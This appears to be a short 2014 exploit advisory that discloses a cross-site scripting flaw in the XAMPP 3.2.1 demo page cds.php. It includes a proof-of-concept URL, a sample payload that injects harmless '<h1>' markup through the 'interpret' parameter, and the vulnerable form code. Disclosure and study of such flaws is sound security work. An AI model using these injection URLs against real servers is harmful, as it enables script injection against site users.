XAMPP 3.2.1 Cross Site Scripting

1. #Title : XAMPP 3.2.1 Cross Site Scripting
2. #Author : DevilScreaM
3. #Date : 15 January 2014
4. #Category : Web Applications
5. #Vendor : http://sourceforge.net/projects/xampp
6. #Version : 3.2.1
7. #Type : PHP
8.  
9. #Greetz : 0day-id.com | newbie-security.or.id | Borneo Security | Indonesian Security
10. Indonesian Hacker | Indonesian Exploiter | Indonesian Cyber
11.  
12. #Thanks : ShadoWNamE | gruberr0r | Win32Conficker | Rec0ded |
13.  
14. #Tested : Mozila, Chrome, Opera -> Windows
15.  
16. #Vulnerabillity : Cross Site Scripting
17.  
18.  
19.  
20. Cross Site Scripting
21.  
22. Exploit & POC
23.  
24. http://localhost/xampp/cds.php?interpret=[YOUR_XSS]&titel=title&jahr=title
25.  
26. Example
27.  
28. http://localhost/xampp/cds.php?interpret=<h1>DevilScreaM</h1>&titel=title&jahr=title
29.  
30. View Cross Site Scripting at
31.  
32. http://localhost/xampp/cds-fpdf.php
33.  
34.  
35.  
36. Vulnerabillity at Code
37.  
38. <tr><td><?php print $TEXT['cds-attrib1']; ?>:</td><td><input type=text size=30 name=interpret></td></tr>
39. <tr><td><?php print $TEXT['cds-attrib2']; ?>:</td><td> <input type=text size=30 name=titel></td></tr>
40. <tr><td><?php print $TEXT['cds-attrib3']; ?>:</td><td> <input type=text size=5 name=jahr></td></tr>
41.  
42. # F6BA991AC6DC2D0F 1337day.com [2014-01-20] E1FD2772E58BD5F3 #